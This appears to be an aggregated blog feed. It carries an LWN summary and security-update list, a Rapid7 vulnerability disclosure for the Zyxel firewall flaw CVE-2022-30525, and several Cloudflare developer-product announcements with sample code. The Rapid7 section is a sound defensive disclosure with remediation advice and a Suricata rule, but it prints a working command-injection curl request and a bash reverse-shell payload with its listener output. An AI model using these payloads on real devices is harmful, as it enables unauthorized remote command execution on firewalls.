[$] Solutions for direct-map fragmentation

Post Syndicated from original https://lwn.net/Articles/894557/

The kernel’s “direct map” makes the entirety of a system’s physical memory
available in the kernel’s virtual address space. Normally, huge pages are used for
this mapping, making it relatively efficient to access. Increasingly,
though, there is a need to carve some pages out of the direct map; this
splits up those huge pages and makes the system as a whole less efficient.
During a memory-management session at the 2022 Linux Storage, Filesystem, Memory-management and BPF Summit (LSFMM), Mike Rapoport led a session on direct-map fragmentation and how it might be avoided.

Security updates for Thursday

Post Syndicated from original https://lwn.net/Articles/895063/

Security updates have been issued by Fedora (microcode_ctl, mingw-SDL2_ttf, seamonkey, and thunderbird), Mageia (cifs-utils, gerbv, golang, libcaca, libxml2, openssl, python-pillow, python-rencode, python-twisted, python-ujson, slurm, and sqlite3), Red Hat (gzip, kernel, kpatch-patch, podman, rsync, subversion:1.10, and zlib), Scientific Linux (gzip), Slackware (curl), SUSE (clamav), and Ubuntu (curl, firefox, linux, linux-aws, linux-aws-5.13, linux-azure, linux-azure-5.13, linux-gcp, linux-gcp-5.13, linux-hwe-5.13, linux-kvm, linux-oracle, linux-raspi, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm, linux-oracle, linux-snapdragon, linux, linux-aws, linux-azure, linux-azure-5.4, linux-azure-fde, linux-gcp, linux-gcp-5.4, linux-gke, linux-gkeop, linux-gkeop-5.4, linux-hwe-5.4, linux-ibm, linux-ibm-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4, linux, linux-aws, linux-kvm, linux-lts-xenial, and linux-oem-5.14).

CVE-2022-30525 (FIXED): Zyxel Firewall Unauthenticated Remote Command Injection

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/


Rapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.

The following table contains the affected models and firmware versions.

Affected Model                      | Affected Firmware Version
USG FLEX 100, 100W, 200, 500, 700   | ZLD5.00 thru ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN               | ZLD5.10 thru ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800         | ZLD5.10 thru ZLD5.21 Patch 1

The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.

Product description

The affected firewalls are advertised for both small branch and corporate headquarter deployments. They offer VPN solutions, SSL inspection, web filtering, intrusion protection, and email security, and advertise up to 5 Gbps throughput through the firewall.

The affected models are relatively popular, with more than 15,000 visible on Shodan.


CVE-2022-30525: Unauthenticated remote command injection

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI and is the result of passing unsanitized attacker input into the os.system method in lib_wan_settings.py. The vulnerable functionality is invoked in association with the setWanPortSt command. An attacker can inject arbitrary commands into the mtu or the data parameter. Below is an example curl that will cause the firewall to execute ping 192.168.1.220:

curl -v --insecure -X POST -H "Content-Type: application/json" \
  -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}' \
  https://192.168.1.1/ztp/cgi-bin/handler

On the firewall, the ps output looks like the following:

nobody   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
nobody   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
nobody   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1
nobody   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           \_ ping 192.168.1.220

A reverse shell can be established using the normal bash GTFOBin. For example:

curl -v --insecure -X POST -H "Content-Type: application/json" \
  -d '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/192.168.1.220/1270 <&1;\";","data":"hi"}' \
  https://192.168.1.1/ztp/cgi-bin/handler

The resulting reverse shell can be used like so:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 192.168.1.1 37882
bash: cannot set terminal process group (11037): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ id
id
uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
bash-5.1$ uname -a
uname -a
Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
bash-5.1$

Metasploit module

A Metasploit module has been developed for these vulnerabilities. The module can be used to establish a nobody Meterpreter session. The following video demonstrates exploitation:




We’ve shared a PCAP that captures Metasploit’s exploitation of a Zyxel USG FLEX 100. The PCAP can be found attached to the module’s pull request. The Metasploit module injects commands in the mtu field, and as such, the following Suricata rule should flag its use:

alert http any any -> any any ( \
    msg:"Possible Zyxel ZTP setWanPortSt mtu Exploit Attempt"; \
    flow:to_server; \
    http.method; content:"POST"; \
    http.uri; content:"/ztp/cgi-bin/handler"; \
    http.request_body; content:"setWanPortSt"; \
    http.request_body; content:"mtu"; \
    http.request_body; pcre:"/mtu["']\s*:\s*["']\s*[^0-9]+/i"; \
    classtype:misc-attack; \
    sid:221270;)

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Remediation

Apply the vendor patch as soon as possible. If possible, enable automatic firmware updates. Disable WAN access to the administrative web interface of the system.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-30525 with a remote vulnerability check.

Disclosure timeline

Astute readers will notice this timeline is a little atypical for Rapid7 disclosures. In accordance with our 60-day disclosure policy, we suggested a coordinated disclosure date in June. Instead, Zyxel released patches to address this issue on April 28, 2022. At that time, Zyxel did not publish an associated CVE or security advisory. On May 9, Rapid7 independently discovered Zyxel’s uncoordinated disclosure. The vendor then reserved CVE-2022-30525.

This patch release is tantamount to releasing details of the vulnerabilities, since attackers and researchers can trivially reverse the patch to learn precise exploitation details, while defenders rarely bother to do this. Therefore, we’re releasing this disclosure early in order to assist defenders in detecting exploitation and to help them decide when to apply this fix in their own environments, according to their own risk tolerances. In other words, silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues.

April 2022 – Discovered by Jake Baines
April 13, 2022 – Rapid7 discloses to [email protected]. Proposed disclosure date June 21, 2022.
April 14, 2022 – Zyxel acknowledges receipt.
April 20, 2022 – Rapid7 asks for an update and shares delight over “Here is how to pronounce ZyXEL’s name”.
April 21, 2022 – Zyxel acknowledges reproduction of the vulnerabilities.
April 28, 2022 – Zyxel releases patches without coordination with vulnerability reporter.
April 29, 2022 – Zyxel indicates patch is likely to release before June 14, 2022.
May 9, 2022 – Rapid7 realizes Zyxel already issued patches. Rapid7 asks Zyxel for a response on the silent patches and indicates that our team will publicly disclose the week of May 9, 2022.
May 10, 2022 – Zyxel reserves CVE-2022-30525 and proposes a new disclosure schedule.
May 12, 2022 – This disclosure bulletin and Metasploit module published.


Announcing Pub/Sub: Programmable MQTT-based Messaging

Post Syndicated from Matt Silverlock original https://blog.cloudflare.com/announcing-pubsub-programmable-mqtt-messaging/


One of the underlying questions that drives Platform Week is “how do we enable developers to build full stack applications on Cloudflare?” With Workers as a serverless environment for easily deploying distributed-by-default applications, KV and Durable Objects for caching and coordination, and R2 as our zero-egress-cost object store, we’ve continued to discuss what else we need to build to help developers create new apps and bring existing ones over to Cloudflare’s Developer Platform.

With that in mind, we’re excited to announce the private beta of Cloudflare Pub/Sub, a programmable message bus built on the ubiquitous and industry-standard MQTT protocol supported by tens of millions of existing devices today.

In a nutshell, Pub/Sub allows you to:

  • Publish event, telemetry or sensor data from any MQTT capable client (and in the future, other client-facing protocols)
  • Write code that can filter, aggregate and/or modify messages as they’re published to the broker using Cloudflare Workers, and before they’re distributed to subscribers, without the need to ferry messages to a single “cloud region”
  • Push events from applications in other clouds, or from on-prem, with Pub/Sub acting as a programmable event router or a hook into persistent data storage (such as R2 or KV)
  • Move logic out of the client, where it can be hard (or risky!) to push updates, or where running code on devices raises the materials cost (CPU, memory), while still keeping latency as low as possible (your code runs in every location).

And there’s likely a long list of things we haven’t even predicted yet. We’ve seen developers build incredible things on top of Cloudflare Workers, and we’re excited to see what they build with the power of a programmable message bus like Pub/Sub, too.

Why, and what is, MQTT?

If you haven’t heard of MQTT before, you might be surprised to know that it’s one of the most pervasive “messaging protocols” deployed today. There are tens of millions (at least!) of devices that speak MQTT today, from connected payment terminals through to autonomous vehicles, cell phones, and even video games. Sensor readings, telemetry, financial transactions and/or mobile notifications & messages are all common use-cases for MQTT, and the flexibility of the protocol allows developers to make trade-offs around reliability, topic hierarchy and persistence specific to their use-case.

We chose MQTT as the foundation for Cloudflare Pub/Sub because we believe in building on top of open, accessible standards, as we did when we chose the Service Worker API as the foundation for Workers, and with our recently announced participation in the Winter Community Group around server-side runtime APIs. We also wanted to give existing clients an easy path to benefit from Cloudflare’s scale and programmability, and to ensure that developers have a rich ecosystem of client libraries in languages they’re familiar with today.

Beyond that, however, we also think MQTT meets the needs of a modern “publish-subscribe” messaging service. It has flexible delivery guarantees, TLS for transport encryption (no bespoke crypto!), a scalable topic creation and subscription model, extensible per-message metadata, and importantly, it provides a well-defined specification with clear error messages.

With that in mind, we expect to support many more “on-ramps” to Pub/Sub: a lot of the best parts of MQTT can be abstracted away from clients who might want to talk to us over HTTP or WebSockets.
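
If you haven’t worked with MQTT directly before, the client side is small. Here is a minimal publish/subscribe sketch using the open-source mqtt.js client; the broker hostname, credentials, and topic names are placeholders, not Pub/Sub specifics:

import mqtt from "mqtt"; // npm install mqtt

// Connect over TLS to a broker (placeholder hostname and credentials).
const client = mqtt.connect("mqtts://broker.example.com:8883", {
  username: "my-device",
  password: "my-token",
});

client.on("connect", () => {
  // Subscribe to a topic filter...
  client.subscribe("sensors/+/temperature");
  // ...and publish a reading with QoS 1 (at-least-once delivery).
  client.publish(
    "sensors/device-1/temperature",
    JSON.stringify({ celsius: 21.4 }),
    { qos: 1 }
  );
});

client.on("message", (topic, payload) => {
  console.log(`${topic}: ${payload.toString()}`);
});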

Building Blocks

Given the ability to write code that acts on every message published to a Pub/Sub Broker, what does it look like in practice?

Here’s a simple-but-illustrative example of handling Pub/Sub messages directly in a Worker. We have clients (in this case, payment terminals) reporting back transaction data, and we want to capture the number of transactions processed in each region, so we can track transaction volumes over time.

Specifically, we:

  1. Filter on a specific topic prefix for messages we care about
  2. Parse the message for a specific key:value pair as a metric
  3. Write that metric directly into Workers Analytics Engine, our new serverless time-series analytics service, so we can directly query it with GraphQL.

This saves us having to stand up and maintain an external metrics service, configure another cloud service, or think about how it will scale: we can do it all directly on Cloudflare.


async function pubsub(
  messages: Array<PubSubMessage>,
  env: any,
  ctx: ExecutionContext
): Promise<Array<PubSubMessage>> {
  
  for (let msg of messages) {
    // Extract a value from the payload and write it to Analytics Engine
    // In this example, a transactionsProcessed counter that our clients are sending
    // back to us.
    if (msg.topic.startsWith("/transactions/")) {
      // This is non-blocking, and doesn’t hold up our message
      // processing.
      env.TELEMETRY.writeDataPoint({
        // We label this metric so that we can query against these labels
        labels: [`${msg.broker}.${msg.namespace}`, msg.payload.region, msg.payload.merchantId],
        metrics: [msg.payload.transactionsProcessed ?? 0]
      });
    }
  }

  // Return our messages back to the Broker
  return messages;
}

const worker = {
  async fetch(req: Request, env: any, ctx: ExecutionContext) {
    // Critical: you must validate the incoming request is from your Broker
    // In the future, Workers will be able to do this on your behalf for Workers
    // in the same account as your Pub/Sub Broker.
    if (await isValidBrokerRequest(req)) {

      // Parse the incoming PubSub messages
      let incomingMessages: Array<PubSubMessage> = await req.json();
      
      // Pass the message to our pubsub handler, and capture the returned
      // messages
      let outgoingMessages = await pubsub(incomingMessages, env, ctx);

      // Re-serialize the messages and return a HTTP 200 so our Broker
      // knows we’ve successfully handled them
      return new Response(JSON.stringify(outgoingMessages), { status: 200 });
    }

    return new Response("not a valid Broker request", { status: 403 });
  },
};

export default worker;

We can then query these metrics directly using a familiar language: SQL. Our query takes the metrics we’ve written and gives us a breakdown of transactions processed by our payment devices, grouped by merchant (and again, all on Cloudflare):

SELECT
  label_2 as region,
  label_3 as merchantId,
  sum(metric_1) as total_transactions
FROM TELEMETRY
WHERE
  metric_1 > 0
  AND timestamp >= now() - 604800
GROUP BY
  region,
  merchantId
ORDER BY
  total_transactions DESC
LIMIT 10

You could replace or augment the calls to Analytics Engine with any number of examples:

  • Asynchronously writing messages (using ctx.waitUntil) on specific topics to our R2 object storage without blocking message delivery
  • Rewriting messages on-the-fly with data populated from KV, before the message is pushed to subscribers
  • Aggregate messages based on their payload and HTTP POST them to legacy infrastructure hosted outside of Cloudflare

Pub/Sub gives you a way to get data into Cloudflare’s network, filter, aggregate and/or mutate it, and push it back out to subscribers — whether there are 10, 1,000 or 10,000 of them listening on that topic.
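
As a sketch of the first of those ideas, the loop in the pubsub() handler above could archive messages under a chosen topic prefix into an R2 bucket, assumed here to be bound as env.ARCHIVE, without blocking delivery back to the Broker:

// Inside the for-loop of the pubsub() handler shown earlier.
// Assumes an R2 bucket binding named ARCHIVE on the Worker.
if (msg.topic.startsWith("/archive/")) {
  // ctx.waitUntil() lets the R2 write complete after the messages
  // have already been returned to the Broker.
  ctx.waitUntil(
    env.ARCHIVE.put(
      `${msg.namespace}${msg.topic}/${Date.now()}.json`,
      JSON.stringify(msg.payload)
    )
  );
}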

Where are we headed?

As we often like to say: we’re just getting started. The private beta for Pub/Sub is just the beginning of our journey, and we have a long list of capabilities we’re already working on.

Critically, one of our priorities is to cover as much of the MQTT v5.0 specification as we can, so that customers can migrate existing deployments and have it “just work”. Useful capabilities like shared subscriptions that allow you to load-balance messages across many subscribers; wildcard subscriptions (both single- and multi-tier) for aggregation use cases; stronger delivery guarantees (QoS); and support for additional authentication modes (specifically, Mutual TLS) are just a few of the things we’re working on.
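
For context, here is how those subscription features look from a standard MQTT v5 client; the topic names are illustrative:

import mqtt from "mqtt";

const client = mqtt.connect("mqtts://broker.example.com:8883");

// Single-level (+) and multi-level (#) wildcard subscriptions:
client.subscribe("stores/+/pos/transactions"); // any single store
client.subscribe("stores/#");                  // everything under stores/

// Shared subscription: messages matching the filter are load-balanced
// across every subscriber in the "billing" group.
client.subscribe("$share/billing/stores/+/pos/transactions");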

Beyond that, we’re focused on making sure Pub/Sub’s developer experience is the best it can be, and during the beta we’ll be:

  • Supporting a new set of “pubsub” sub-commands in Wrangler, our developer CLI, so that getting started is as low-friction as possible
  • Building ‘native’ bindings (similar to how Workers KV operates) that allow you to publish messages and subscribe to topics directly from Worker code, regardless of whether the message originates from (or is destined for) a client beyond Cloudflare
  • Exploring more ways to publish & subscribe from non-MQTT based clients, including HTTP requests and WebSockets, so that integrating existing code is even easier.

Our developer documentation will cover these capabilities as we land them.

We’re also aware that pricing is a huge part of developer experience, and are committed to ensuring that there is an accessible and flexible free tier. We want to enable developers to experiment, prototype and solve problems we haven’t thought of yet. We’ll be sharing more on pricing during the course of the beta.

Getting Started

If you want to start using Pub/Sub, sign up for the private beta: we plan to start enabling access within the next month. We’re looking forward to collecting feedback from developers and seeing what folks start to build.

In the meantime, review the brand-new Pub/Sub developer documentation to understand how Pub/Sub works under the hood, the MQTT protocol, and how it integrates with Cloudflare Workers.

How we built config staging and versioning with HTTP applications

Post Syndicated from Garrett Galow original https://blog.cloudflare.com/version-and-stage-configuration-changes-with-http-applications/


Last December, we announced a closed beta of a new product, HTTP Applications, giving customers the ability to better control their L7 Cloudflare configuration with versioning and staging capabilities. Today, we are expanding this beta to all enterprise customers who want to participate. In this post, I will talk about some of the improvements that have landed and go into more detail about how this product works.

HTTP Applications

A quick recap of what HTTP Applications are and what they can do. For a deeper dive on how to use them, see the previous blog post.

As previously mentioned: HTTP Applications are a way to manage configuration by use case, rather than by hostname. Each HTTP Application has a purpose, whether that is handling the configuration of your marketing website or an internal application. Each HTTP Application consists of a set of versions where each represents a snapshot of settings for managing traffic — Page Rules, Firewall Rules, cache settings, etc. Each version of configuration inside the HTTP Application is independent of the others, and when a new version is created, it is initialized as a copy of the version that preceded it.
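
One rough way to picture that model (the types below are illustrative, not Cloudflare’s API):

// Illustrative sketch of the HTTP Application data model.
interface ConfigVersion {
  version: number;                   // 1, 2, 3, ...
  settings: Record<string, unknown>; // Page Rules, Firewall Rules, cache settings, etc.
}

interface HttpApplication {
  id: string;                // e.g. "xyz"
  sourceZone: string;        // the zone the first version was copied from
  versions: ConfigVersion[]; // each new version starts as a copy of the last
}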

An HTTP Application can be represented with the following diagram:

[diagram]

Each HTTP Application is sourced from an existing zone. That zone’s current configuration is copied to instantiate the first version of the HTTP Application; after that, changes made to the zone and changes made to version 1 are independent of each other. Versions themselves don’t affect any traffic for a zone until they are deployed via Routing Rules.

Routing Rules

Unlike zones, each version of an HTTP Application is independent of any specific hostname. So if versions are not tied to a hostname, like zones, then how do you decide which version of an HTTP Application will affect a specific set of traffic? The answer is Routing Rules. With Routing Rules, you get to decide which version of an HTTP Application is applied to traffic. Routing Rules are powered by Cloudflare’s Ruleset Engine and rely on the use of conditional “if, then” rules to map hostnames controlled in your Cloudflare account to a version of configuration. As an example, a rule could be:

If zone.name = `example.com`
Then use configuration of HTTP Application id: xyz, version 2

When this rule executes on our global network, instead of applying the regular zone configuration of example.com, we will instead use the configuration defined in version 2 of the HTTP Application.

Expanding the previous diagram we get the following:

[diagram]

The combination of Routing Rules and HTTP Applications means you can ‘stage’ a set of changes, via a version, without requiring a separate staging zone as has been required in the past. Cloudflare will provide you with specific IPs that can be used to test the configuration before rolling it out to production. This means you can catch misconfigurations in rules or other settings before it impacts your customers.

How HTTP Applications and Routing Rules work

Let’s break down how this all works behind the scenes and how it gives you a safe way to test changes to your configuration. In all of Cloudflare’s data centers around the world, every request is first inspected and associated with an account/config pair so that we know what configuration settings we should apply to this request. If you have the zone ‘example.com’, with an id of 123, in your account, with an id of 777, then when a request for example.com/cat.jpg arrives at the Cloudflare network, the ownership lookup will return a value like 777:123, which denotes the account and config settings we should use to process that request.

When HTTP Applications and Routing Rules are being used, the ownership lookup occurs as normal, but instead of loading configuration based on the zone for the account:config pair, Cloudflare does one additional lookup to see if any routing rules are in place that would change which configuration should be used. If a rule exists like before:

If zone.name = `example.com`
Then use configuration of HTTP Application id: xyz, version 2

Then when ownership is evaluated, instead of loading configuration for account:config 777:123, Cloudflare will load the configuration of the version of that HTTP Application, let’s say that version 2 from the rule has a config id of 456. Then the lookup value for loading configuration will instead be 777:456.
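
In pseudocode (an illustration of the behavior described above, not Cloudflare’s actual implementation), the lookup works like this:

// Illustrative model of the ownership + Routing Rule lookup.
interface RoutingRule {
  matches(zoneName: string): boolean;
  versionConfigId: number; // config id of an HTTP Application version
}

const routingRules: RoutingRule[] = [
  { matches: (zone) => zone === "example.com", versionConfigId: 456 },
];

function resolveConfig(zoneName: string, accountId: number, zoneConfigId: number): string {
  // The normal ownership lookup produced account:config, e.g. 777:123.
  let configId = zoneConfigId;
  // One additional lookup: a Routing Rule can swap in the configuration
  // of an HTTP Application version instead.
  const rule = routingRules.find((r) => r.matches(zoneName));
  if (rule) configId = rule.versionConfigId;
  return `${accountId}:${configId}`;
}

resolveConfig("example.com", 777, 123); // "777:456"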


Because Routing Rules are implemented with the Ruleset Engine, we can implement a special type of rule to allow a version to be staged such that it is only executed for requests when the request is sent to IPs reserved for testing. The resulting diagram is almost the same, but because the request is being sent to staging IPs, Cloudflare’s network will route that request to a different version of the HTTP Application that has a set of changes not yet deployed for all other traffic.

[diagram]

This is what enables you to safely test a set of changes and then simultaneously deploy the exact same configuration to all traffic. If anything goes wrong when testing in staging or rolling out to production, you can simply roll back the configuration to the previous version that was deployed. No need to try and hunt down what settings may have changed. That investigation can be done after the issue has been resolved through a quick, one-click rollback.

Now available for Enterprise Customers

HTTP Applications and Routing Rules put power and safety in customers’ hands so that configuration changes can be made more easily. When issues do arise, they can be resolved quickly through rollbacks. We will continue expanding the capabilities offered throughout the year, but if you are interested in trying it out now and are an enterprise customer, talk to your account manager to get access!

Introducing Custom Domains for Workers

Post Syndicated from Kabir Sikand original https://blog.cloudflare.com/custom-domains-for-workers/


Today, we’re happy to announce Custom Domains for Workers. Custom Domains allow you to hook up a domain to your Worker, without having to fuss about certificates, origin servers or DNS – it just works. Let’s take a look at how we built Custom Domains and how you can use them.

The magic of Cloudflare DNS

Under the hood, we’re leveraging Cloudflare DNS to register your Worker as the origin for your domain. All you need to do is head to your Worker, go to the Triggers tab, and click Add Custom Domain. Cloudflare will handle creating the DNS record and issuing a certificate on your behalf. In seconds, your domain will point to your Worker, and all you need to worry about is writing your code. We’ll also help guide you through the process of creating these new records and replace any existing ones. We built this with a straightforward ethos in mind: we should be clear and transparent about actions we’re taking, and make it easy to understand.

We’ve made a few welcome changes when you’re using a Custom Domain on your Worker. First off, when you send a request to any path on that Custom Domain, your Worker will be triggered. No need to create a route with /* at the end.


Second, your Custom Domain Worker is considered the ‘origin server’. That means, no need to `fetch(event.request)` once you’re in that Worker; instead, talk to any internal or external services you need to by creating request objects in your code, or talk to other Workers services using any of our available bindings. We’ve increased the limit of external requests you can make, when using our Unbound usage model, to 1,000. You can talk to any services you’d like to – things like payment, communication, analytics, or tracking services come to mind, not to mention your databases. If that’s not enough for your use case, feel free to reach out via Discord or support, and we’ll happily chat.


Finally, what if you need to talk to your Worker from another one? Since these Workers act as an origin server, you can just send a normal request to the associated endpoint, and we’ll invoke that Worker – even if it’s on the same Cloudflare zone.
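
For example, another Worker can reach a Worker behind the (hypothetical) Custom Domain api.example.com with a plain fetch:

export default {
  async fetch(request: Request): Promise<Response> {
    // api.example.com is a Custom Domain whose origin is another Worker;
    // an ordinary fetch invokes it, even from the same Cloudflare zone.
    return fetch("https://api.example.com/login", {
      method: "POST",
      body: await request.text(),
    });
  },
};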


Let’s build an example application

We’ll start by writing our application. I have an example that I’ve called api-gateway below. It checks the incoming request path, and delegates work to downstream Workers using Service Bindings. For any privileged endpoints, it performs an authorization check before executing that code:

export default {
 async fetch(request, environment) {
   const url = new URL(request.url);
   switch (url.pathname) {
     case '/login':
       return await environment.login.fetch(request);

     case '/logout':
       return await environment.logout.fetch(request);

     case '/admin': {
       // Check that the "Authorization" header is sent when authenticated.
       const authCheck = await environment.auth.fetch(request.clone());
       if (authCheck.status != 200) { return authCheck }
       // If the auth check passes, send the request to the /admin endpoint
       return await environment.admin.fetch(request);
     }

     case '/robots.txt':
       return new Response(null, { status: 204 });
   }
   return new Response('Not Found.', { status: 404 });
 }
}

Now that I have a working application, I want to serve it on my Custom Domain. To hook this up, head over to Workers, Triggers, click ‘Add Custom Domain’, and type in your desired hostname. You’ll be guided through a simple workflow to generate your new Worker record, and your Worker will be the target.

Best of all, with Custom Domains you can reap the performance benefits of DNS-routable Workers; Cloudflare never has to look through a routing table to invoke your Worker. And, by leveraging Service Bindings, you can customize your routing to your heart’s content – using URL parameters, headers, request content, or query strings to appropriately invoke the right Worker at the right time.

We’re excited to see what you build with Custom Domains. Custom Domains are available in an Open Beta starting today. Support is built right into the Cloudflare Dashboard and APIs, and CLI support via Wrangler is coming soon.

Introducing Pages Plugins

Post Syndicated from Nevi Shah original https://blog.cloudflare.com/cloudflare-pages-plugins/


Last November, we announced that Pages is now a full-stack development platform with our open beta integration with Cloudflare Workers. Using file-based routing, you can drop your Pages Functions into a /functions folder and deploy them alongside your static assets to add dynamic functionality to your site. However, throughout this beta period, we observed the types of projects users have been building, noticed some common patterns, and identified ways to make these users more efficient.

There are certain functionalities that are shared between projects; for example, validating authorization headers, creating an API server, reporting errors, and integrating with third-party vendors to track aspects like performance. The frequent need for these patterns across projects made us wonder, “What if we could provide the ready-made code for developers to add to their existing project?”

Introducing Pages Plugins!

What’s a Pages Plugin?

With Pages Functions, we introduced file-based routing, so users could avoid writing their own routing logic, significantly reducing the amount of boilerplate code a typical application requires. Pages Plugins aims to offer a similar experience!

A Pages Plugin is a reusable – and customizable – chunk of runtime code that can be incorporated anywhere within your Pages application. A Plugin is effectively a composable Pages Function, granting Plugins the full power of Functions (and therefore, Workers), including the ability to set up middleware, parameterized routes, and static assets.

How does it work?

Today, Pages Plugins is launching with a few ready-made solutions for Sentry, Honeycomb, and Stytch (more below), but it’s important to note that developers anywhere can create and share their Pages Plugins, too! You just need to install a Plugin, mount it to a route within the /functions directory, and configure the Plugin according to its needs.

Let’s take a look at a Plugins example for a hypothetical ACME logger:

Assume you find an @acme/pages-plugin-logger package on npm and want to use it within your application – you’d install, import, and invoke it as you would any other npm module. After passing through the required (hypothetical) configuration and mounting it as the top-level middleware’s onRequest export, the ACME logger will be reporting on all incoming requests:

// file: /functions/_middleware.ts

import MyLogger from "@acme/pages-plugin-logger";

// Setup logging for all URL routes & methods
export const onRequest = MyLogger({
 endpoint: "https://logs.acme.com/new",
 secret: "password",
});

You can help grow the Plugins ecosystem by building and sharing your Plugins on npm and our developer documentation, and you can immediately get started by using one of Cloudflare’s official launch partner Plugins today.

Introducing our Plugins launch partners

With Pages, we’re always working to see how we can best cater to user workflows by integrating directly with users’ preferred tools. We see Plugins as an excellent opportunity to collaborate with popular third-party observability, monitoring, and authentication providers to provide their own Pages Plugins.

Today, we’re proud to launch our Pages Plugins with Sentry, Honeycomb and Stytch as official partners!


Sentry

Sentry provides developer-first application monitoring for real-time insights into your production deployments. With Sentry you can see the errors, crashes, or latencies experienced while using your app and get the deep context needed to solve issues quickly, like the line of code where the error occurred, the developer or commit that introduced the error, or the API call or database query causing the slowdown. The Sentry Plugin automatically captures any exceptions in your Pages Functions and sends them to Sentry where you can aggregate, analyze, and triage any issues your application encounters.

// ./functions/_middleware.ts

import sentryPlugin from "@cloudflare/pages-plugin-sentry";

export const onRequest = sentryPlugin({
 dsn: "YOUR_SENTRY_DSN",
});

Honeycomb

Similarly, Honeycomb is also an observability and monitoring platform meant to visualize, analyze and improve application quality and performance to help you find patterns and outliers in your application data. The Honeycomb Plugin creates traces for every request that your Pages application receives and automatically sends that information to Honeycomb for analysis.

// ./functions/_middleware.ts

import honeycombPlugin from "@cloudflare/pages-plugin-honeycomb";

export const onRequest = honeycombPlugin({
 apiKey: "YOUR_HONEYCOMB_API_KEY",
 dataset: "YOUR_HONEYCOMB_DATASET_NAME",
});

Stytch

Observability is just one use case of how Pages Plugins can help you build a more powerful app. Stytch is an API-first platform that improves security and promotes a better user experience with passwordless authentication. Our Stytch Plugin transparently validates user sessions, allowing you to easily protect parts of your application behind a Stytch login.

// ./functions/_middleware.ts

import stytchPlugin from "@cloudflare/pages-plugin-stytch";
import { envs } from "@cloudflare/pages-plugin-stytch/api";

export const onRequest = stytchPlugin({
  project_id: "YOUR_STYTCH_PROJECT_ID",
  secret: "YOUR_STYTCH_PROJECT_SECRET",
  env: envs.live
});

More Plugins, more fun!

As a developer platform, it’s crucial to build relationships with the creators of the tooling and frameworks you use alongside Pages, and we look forward to growing our partnership ecosystem even more in the future. Beyond partnerships, though, we’ve also built out some extremely useful Plugins of our own to get you started!

  • Google Chat: creates a Google Chat bot which can respond to messages. It also includes an API for interacting with Google Chat (for example, for creating messages) without the need for user input. This API is useful for situations such as alerts.
  • Cloudflare Access: a middleware to validate Cloudflare Access JWT assertions. It also includes an API to lookup additional information about a given user’s JSON Web Token.
  • Static forms: intercepts static HTML form submissions and can perform actions such as storing the data in KV.
  • GraphQL: creates a GraphQL API for a given schema. It also ships with the GraphQL Playground to simplify development and help you test out your API.
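
For instance, mounting the Cloudflare Access Plugin from the list above follows the same pattern as the partner Plugins. Treat the package name and options here as a sketch and check the developer documentation for the exact interface:

// ./functions/admin/_middleware.ts
// Package name and options are assumptions based on the pattern above.

import cloudflareAccessPlugin from "@cloudflare/pages-plugin-cloudflare-access";

export const onRequest = cloudflareAccessPlugin({
  domain: "https://YOUR_TEAM.cloudflareaccess.com",
  aud: "YOUR_ACCESS_APPLICATION_AUD",
});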

Over the next couple of months we will be working to build out some of the most requested Plugins relevant to your projects. For now, you can find all officially supported Plugins in our developer documentation.

No time to wait? Author your own!

But don’t let us be your bottleneck! The beauty of Plugins is how easy they are to create and distribute. In fact, we encourage you to try out our documentation in order to create and share your own Plugin because chances are if you’re building a Plugin for your own project, there is someone else who would benefit greatly from it too!
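
To give a flavor of what authoring involves: a Plugin is essentially a function that accepts configuration and returns a Pages Function. Here is a minimal sketch in the shape of the hypothetical ACME logger from earlier (all names are illustrative):

// file: index.ts of the hypothetical @acme/pages-plugin-logger package

interface PluginContext {
  request: Request;
  next: () => Promise<Response>;
  waitUntil: (promise: Promise<unknown>) => void;
}

export default function loggerPlugin(options: { endpoint: string; secret: string }) {
  // The returned function is an ordinary Pages Function, so it can be
  // mounted as any onRequest export, including top-level middleware.
  return async (context: PluginContext): Promise<Response> => {
    const started = Date.now();
    const response = await context.next(); // run the rest of the chain
    // Report timing without blocking the response.
    context.waitUntil(
      fetch(options.endpoint, {
        method: "POST",
        headers: { Authorization: options.secret },
        body: JSON.stringify({ url: context.request.url, ms: Date.now() - started }),
      })
    );
    return response;
  };
}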

